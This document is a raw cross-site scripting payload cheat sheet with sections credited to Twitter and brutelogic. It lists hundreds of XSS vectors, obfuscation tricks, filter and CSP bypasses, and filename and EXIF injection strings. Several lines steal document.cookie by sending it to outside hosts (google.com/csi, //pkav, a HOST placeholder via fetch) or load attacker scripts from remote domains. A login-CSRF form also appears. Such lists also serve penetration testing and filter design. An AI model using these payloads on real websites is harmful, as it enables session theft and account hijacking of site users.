##############################Twitter:XSS Payload#########################################

Filename="<<script>alert('xss')<!--a-->a.jpg"

<script>location.href;'javascript:alert(1)'</script>

<math xml:base="javascript:alert(1)//">
    <mrow href="#">qwe</mrow>
</math>

<svg>
<a xml:base="javascript:alert(1)//" href="#"><circle r="100" />
</svg>

'>--><script/src=//go.bmoine.fr/xss>

"'>--><a/target=_blank href=//go.bmoine.fr/tab-nabbing>Polyglot XSS</a>

"alert(1)".replace(/./g,function(c){return String.fromCharCode(parseInt('26'+c.charCodeAt(0).toString(16),16))})

unescape(escape("♡♬♥♲♴☨☱☩").replace(/u../g,''))

alert(unescape(escape(/󠅬󠅷󠅡󠅹󠅳󠄠󠅢󠅥󠄠󠅷󠅡󠅲󠅹󠄠󠅯󠅦󠄠󠅊󠅡󠅶󠅡󠅳󠅣󠅲󠅩󠅰󠅴󠄠󠅣󠅯󠅮󠅴󠅡󠅩󠅮󠅩󠅮󠅧󠄠󠅱󠅵󠅯󠅴󠅥󠅳󠄮󠄠󠅎󠅯󠄠󠅱󠅵󠅯󠅴󠅥󠅳󠄠󠄽󠄠󠅳󠅡󠅦󠅥󠄡/).replace(/u.{8}/g,[])))


q=e=>{return e};q.constructor(String.raw(q`a${0}e${0}t${0}1337)`,'l','r','('))();


(new Array).filter.constructor('alert(1)')()
[].constructor.constructor('alert(1)')()
[]['constructor']['constructor']('alert(1)')()
[][x='constructor'][x]('alert(1)')()
[][ㅤ='constructor'][ㅤ]('alert(1)')()


[][ㅤ='constructor'][ㅤ]('ert('.padStart(6,'al').padEnd(8,'1)'))()


Object.bind(null,alert)()(1)


[][ㅤ=/constructor/.source][ㅤ](/alert(1)/.source)()
for(n in{constructor:0})[][ㅤ=n][ㅤ](/alert(1)/.source)()


[][ㅤ='constructor'][ㅤ]('alert(1)')()


Function("a=`","`,xss=1){alert(xss)")() 
Function('a=`${alert`','`}`){')()


Function('x=alert`1`','y')()


<script>
document.write('<script>/*');
</script>
*/alert(1)
</script>


<script>
    document.write('<math><!--');
 </script>
 <i name="--><head><script>//">
alert(1)
<!--</script>-->


<q/oncut=alert()>
<s/onclick=alert()>b


<a=" onclick="alert(1)//">clickme</a>


x=x=>{}/alert(1)/+alert(2)


open('','_self').alert(1)


<% style=behavior:url(: onreadystatechange=alert(1)>

<link rel=import href=/%http://0d-z.exeye.io >

alert(+'   0O2471   ')


<script src="/ゝhttp://html5sec.org/test.js  "></script>


<svg><animate href=#x attributeName=href values="&#x3000;javascript:alert('1')"/><a id=x><circle r=100>


/1/[Symbol.replace]('1',alert)


Object.defineProperties(window,{'location':{value:'javascript:alert(1)'}})


Array.map([1],alert)

Array.from([1],alert)


?x=<script%20src=data:&x=alert(1);>


alert(String.fromCodePoint(88,83,83))


toJSON=alert;JSON.stringify(window);

{...{toString:()=>alert()}} 

<form oninput="alert(1)"><input type="range"

{{[].pop.constructor('alert()')()}}

<meter onmouseover="alert(1)"

alert(1) /alert`2`/i


for([]o\u{66}!\u{61}\u{6c}\u{65}\u{72}\u{74}`1`)\u{66}


(()=>{
try{
return alert(1),eval('throw 1');
}catch(e){
return alert(2)
}finally{
return alert(3)
}
})()


open`javascript:alert(1)//#${'_self'}`
setTimeout`alert(1);//${1000}`

<a href="" onclick=``/name==alert(1)>clickme</a>
<a href="" onclick=``/*/alt="*//alert(1)//">clickme</a>


0..constructor.constructor`alert(1)```
location.assign`javascript:alert(1)`
location.replace`javascript:alert(1)`


location.reload`javascript:alert(1)` 
location.href`javascript:alert(1)`
location`javascript:alert(1)`


);HTP.PRINT(:1);--=pwned<svg/onload=prompt('XSS\u0020via\u0020sql\u0020injection')>


if(/*@cc_on!@*/0==1)
{
alert(1);
}
else
{
alert(2);
}
</script>


<details onfocus = "alert(1)">

location=`http://google.com/csi ?${escape(document.cookie)}`;


document.write(`<script>//# sourceMappingURL=https://pkav/?${escape(document.cookie)}</script>`)


a=document.createElement('a')
a.href='#'
a. ping=`//pkav/?${escape(document.cookie)}`
a. click()


[...`${alert(1)}`]

00000`${alert(1)}`

`${alert(1)/*}`*/}`

<script>a=`jackmasa<!--<script/\`;</script>
<input value="${alert(1)}`</script/">


String.raw(a=alert(1),1,2)


a=`${alert`1`}`


Function("a=`","`,xss=1){alert(xss)")()

a=`${alert/*}`;
b=`*/(1)}`;

<svg onload=eval(URL)>//22
<script src=//l0.cm>//20

<script/src=//⑭.₨> 


let:let{let:[x=1]}=[alert(1)]

x=x=>x=>x=>x=>x=>x=>x=>alert(1);x()()()()()()()()


o={1.e+1111(){alert(arguments.callee);}};o[1e1111]()


eval(`ale${[[[[]=[]]=[[]=[]]]=[[]=[]]]=[]}rt(1)`);


x=(lol=alert(1),x=class x extends x{constructor(){alert(1)}}()()()()())


!class extends`${alert(1)}```{}


f=(x=alert(1))=>{}; f();


<a href="javascript:document.write('spoof'); void(0);">Middle-click me</a>


"alert(1)" instanceof [];

<meta http-equiv=x-ua-compatible content=ie=8>
1<comment onresize=alert(1) contenteditable>1


<script>
({[alert(1)](){}});
({get[alert(2)](){}});
({set[alert(3)](a){}});
</script>


<meta http-equiv="X-UA-Compatible" content="IE=5">
<a style="font-family:}behavior=URL(\.sct)">B


<%/%=%&#62<&#112/&#111&#110&#114&#101&#115&#105&#122&#101=&#97&#108&#101&#114&#116(1)//>

Array[Symbol.species].constructor('alert(1)')();


({[alert`xss`]:1})


Lol:Function`alert(1)```````````


<noscript><noscript></noscript><script>confirm(1)</script></noscript>


document.body.innerHTML='"onerror="alert(1)">'.anchor('"><img src=');


data:text/html;alert(1)/*,<svg%20onload=eval(unescape(location))><title>*/;alert(2);function%20text(){};function%20html(){}


!function(lol=alert(1)){}()


<base href=data:/,alert(1)/><script src="jquery.js"></script>


<base/href=j&#x041va&#83cript&#x3a&#x2f>


<iframe/src=%&#050f&#x2fben.mario#%0Anew%20alert%20`3`;width=1 height=1 style=visibility:hidden;/>


<a href="//ben.mario#%0Aalert(3);">CLICKME</a>


<base href=javascript:/0/><iframe src=,alert(1)></iframe>


(function([a,b,c]=[1,2,3]){alert(`${a},${b},${c}`)})()


-{'valueOf'(){setTimeout(this)},[Symbol['toStringTag']]:'=alert`1`'}


-{valueOf(){alert`:D`}}


delete []['__proto__']['toString'];
[]['__proto__'][Symbol.toStringTag]='=alert(1)';
eval([1,2,3]+'');


object=1;eval({[Symbol.toStringTag]: ',alert(1)'}+'')


<script>
({' \
'(){alert(1)}})[` \
`]()
</script>


```${``[class extends[alert``]{}]}```
[class extends[alert````]{}]


<script src=data:,\u006fnerror=\u0061lert;throw[document.domain]></script>


"><svg><script/xlink:href="data:,alert(1)
<svg><script/xlink:href=data:,alert(1)></script>



<img onerror=alert(1) src <u></u> 


<script>alert(1)</script/ 


base href="data:\"><link rel=import href='q,<script>alert(1)</script>'> 


<div style=animation-name:x onanimationstart=alert(1)> 


<base href="javascript:\"> <a href="//%0aalert(/1/);//">link</a>   Works in Chrome only


 javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>


 <script>let{location={href:'http://evil.com/ '}}=0;alert(location.href);</script> 


 <meta/content="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxMzM3KTwvc2NyaXB0Pg=="http-equiv=refresh>


 !{x(){alert(1)}}.x()


 eval(String.raw({[`raw`]:`aet(1)`},...`lr`))


 <svg </onload ="1> (_=alert,_(1337)) "">


 <script>setTimeout(location)</script>, use: <a href="//target#&#8232;alert(1)">CLICK</a>


<a href="javascript&colon;&apos;<script src=/&sol;&ETH;.pw&nvgt;</script&nvgt;&apos;">CLICK</a>

document.write('<script src="https://rootme.in/jsprops.js "><\/script>')

#######################################brutelogic#########################################
<svg onload=alert(1)>
"><svg onload=alert(1)//


"onmouseover=alert(1)//
"autofocus/onfocus=alert(1)//



'-alert(1)-'
'-alert(1)//

\'-alert(1)//

</script><svg onload=alert(1)>

http://DOMAIN/PAGE.php/"><svg onload=alert(1)>


<svg onload=alert`1`>
<svg onload=alert&lpar;1&rpar;>
<svg onload=alert&#x28;1&#x29>
<svg onload=alert&#40;1&#41>

(alert)(1)
a=alert,a(1)
[1].find(alert)
top["al"+"ert"](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
top['al\145rt'](1)
top['al\x65rt'](1)
top[8680439..toString(30)](1)


<body onload=alert(1)>
<body onpageshow=alert(1)>
<body onfocus=alert(1)>
<body onhashchange=alert(1)><a href=#x>click this!#x
<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x
<body onscroll=alert(1)><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><x id=x>#x
<body onresize=alert(1)>press F12!
<body onhelp=alert(1)>press F1! (MSIE)


<marquee onstart=alert(1)>
<marquee loop=1 width=0 onfinish=alert(1)>
<audio src onloadstart=alert(1)>
<video onloadstart=alert(1)><source>
<input autofocus onblur=alert(1)>
<keygen autofocus onfocus=alert(1)>
<form onsubmit=alert(1)><input type=submit>
<select onchange=alert(1)><option>1<option>2
<menu id=x contextmenu=x onshow=alert(1)>right click me!


<x contenteditable onblur=alert(1)>lose focus! 
<x onclick=alert(1)>click this! 
<x oncopy=alert(1)>copy this! 
<x oncontextmenu=alert(1)>right click this! 
<x oncut=alert(1)>copy this! 
<x ondblclick=alert(1)>double click this! 
<x ondrag=alert(1)>drag this! 
<x contenteditable onfocus=alert(1)>focus this! 
<x contenteditable oninput=alert(1)>input here! 
<x contenteditable onkeydown=alert(1)>press any key! 
<x contenteditable onkeypress=alert(1)>press any key! 
<x contenteditable onkeyup=alert(1)>press any key! 
<x onmousedown=alert(1)>click this! 
<x onmousemove=alert(1)>hover this! 
<x onmouseout=alert(1)>hover this! 
<x onmouseover=alert(1)>hover this! 
<x onmouseup=alert(1)>click this! 
<x contenteditable onpaste=alert(1)>paste here!


<script>alert(1)// 
<script>alert(1)<!–


<script src=//brutelogic.com.br/1.js> 
<script src=//3334957647/1>

<x onxxx=alert(1) 1='


<svg onload=setInterval(function(){with(document)body. 
appendChild(createElement('script')).src='//HOST:PORT'},0)> 

'onload=alert(1)><svg/1='

'>alert(1)</script><script/1=' 
*/alert(1)</script><script>/*

*/alert(1)">'onload="/*<svg/1=' 
`-alert(1)">'onload="`<svg/1='

*/</script>'>alert(1)/*<script/1='


p=<svg/1='&q='onload=alert(1)>


p=<svg 1='&q='onload='/*&r=*/alert(1)'>


<script>alert(1)</script> 
<script src=javascript:alert(1)> 
<iframe src=javascript:alert(1)> 
<embed src=javascript:alert(1)> 
<a href=javascript:alert(1)>click 
<math><brute href=javascript:alert(1)>click 
<form action=javascript:alert(1)><input type=submit> 
<isindex action=javascript:alert(1) type=submit value=click> 
<form><button formaction=javascript:alert(1)>click 
<form><input formaction=javascript:alert(1) type=submit value=click> 
<form><input formaction=javascript:alert(1) type=image value=click> 
<form><input formaction=javascript:alert(1) type=image src=SOURCE> 
<isindex formaction=javascript:alert(1) type=submit value=click> 
<object data=javascript:alert(1)> 
<iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;> 
<svg><script xlink:href=data:,alert(1) /> 
<math><brute xlink:href=javascript:alert(1)>click 
<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>


<html ontouchstart=alert(1)> 
<html ontouchend=alert(1)> 
<html ontouchmove=alert(1)> 
<html ontouchcancel=alert(1)>
<body onorientationchange=alert(1)>


For Mobile Platform
<svg onload=alert(navigator.connection.type)> 
<svg onload=alert(navigator.battery.level)> 
<svg onload=alert(navigator.battery.dischargingTime)>
<svg onload=alert(navigator.battery.charging)>
<svg onload=navigator.vibrate(500)> 
<svg onload=navigator.vibrate([500,300,100])>


<iframe src=LOGOUT_URL onload=forms[0].submit()> 
</iframe><form method=post action=LOGIN_URL> 
<input name=USERNAME_PARAMETER_NAME value=USERNAME> 
<input name=PASSWORD_PARAMETER_NAME value=PASSWORD>


Injection in Filename
"><img src=1 onerror=alert(1)>.gif

Injection in Metadata
$ exiftool -Artist='"><img src=1 onerror=alert(1)>' FILENAME.jpeg

Injection with SVG File
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>

Injection with GIF File as Source of Script (CSP Bypass)
GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;


<script src="data:&comma;alert(1)// 
"><script src=data:&comma;alert(1)// 

<script src="//brutelogic.com.br&sol;1.js&num; 
"><script src=//brutelogic.com.br&sol;1.js&num; 

<link rel=import href="data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt; 
"><link rel=import href=data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt;


PHP File for XHR Remote Call
<?php header(“Access-Control-Allow-Origin: *”); ?>
<img src=1 onerror=alert(1)>


Server Log Avoidance	
<svg onload=eval(URL.slice(-8))>#alert(1)
<svg onload=eval(location.hash.slice(1)>#alert(1)
<svg onload=innerHTML=location.hash>#<script>alert(1)</script>



Shortest PoC	
<base href=//0>
$ while:; do echo "alert(1)" | nc -lp80; done


So it becomes another good place to put javascript code:
http://alert(1)@brutelogic.com.br/webgun/test.php?p=<svg+onload=eval(URL.slice(7,15))>

http://javascript:alert(1)@brutelogic.com.br/webgun/test.php?p=<svg+onload=location=URL.slice(7,26)>



Chrome XSS Auditor – SVG Bypass
<svg><a><rect width=100% height=100%>

<svg><a><rect width=100% height=100%><animate attributeName=width from=0 to=100% dur=2s>

<svg><a><rect width=100% height=100% /><animate attributeName=href to=//google.com>

<svg><a><rect width=100% height=100%><animate attributeName=href from=//google.com to=?>

<svg><a><rect width=100% height=100% /><animate attributeName=href to=javas&#99ript:alert(1)>

<svg width=12cm height=9cm><a><image href=//brutelogic.com.br/yt.jpg /><animate attributeName=href values=javas&#99ript:alert(1)>





<svg onload=fetch(‘//HOST/?cookie=’+document.cookie)>
<svg onload=”document.body.innerHTML='<img src=//HOST/IMAGE>'”>


<frameset><frame src onload=alert(1)>


#########################################################################################
"><img src=x onerror=prompt(1)>
"><svg/onload=prompt(1)>
"><iframe/src=javascript:prompt(1)>
"><h1 onclick=prompt(1)>Clickme</h1>
"><a href=javascript:prompt(1)>Clickme</a>
"><a href="javascript:confirm%28 1%29">Clickme</a>
"><a href="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+">click</a>
"><textarea autofocus onfocus=prompt(1)>
"><a/href=javascript&colon;co\u006efir\u006d&#40;&quot;1&quot;&#41;>clickme</a>
"><script>co\u006efir\u006d`1`</script>
"><ScRiPt>co\u006efir\u006d`1`</ScRiPt>
"><img src=x onerror=co\u006efir\u006d`1`>
"><svg/onload=co\u006efir\u006d`1`>
"><iframe/src=javascript:co\u006efir\u006d%28 1%29>
"><h1 onclick=co\u006efir\u006d(1)>Clickme</h1>
"><a href=javascript:prompt%28 1%29>Clickme</a>
"><a href="javascript:co\u006efir\u006d%28 1%29">Clickme</a>
"><textarea autofocus onfocus=co\u006efir\u006d(1)>
"><details/ontoggle=co\u006efir\u006d`1`>clickmeonchrome
"><p/id=1%0Aonmousemove%0A=%0Aconfirm`1`>hoveme
"><img/src=x%0Aonerror=prompt`1`>
"><iframe srcdoc="&lt;img src&equals;x:x onerror&equals;alert&lpar;1&rpar;&gt;">
"><h1/ondrag=co\u006efir\u006d`1`)>DragMe</h1>









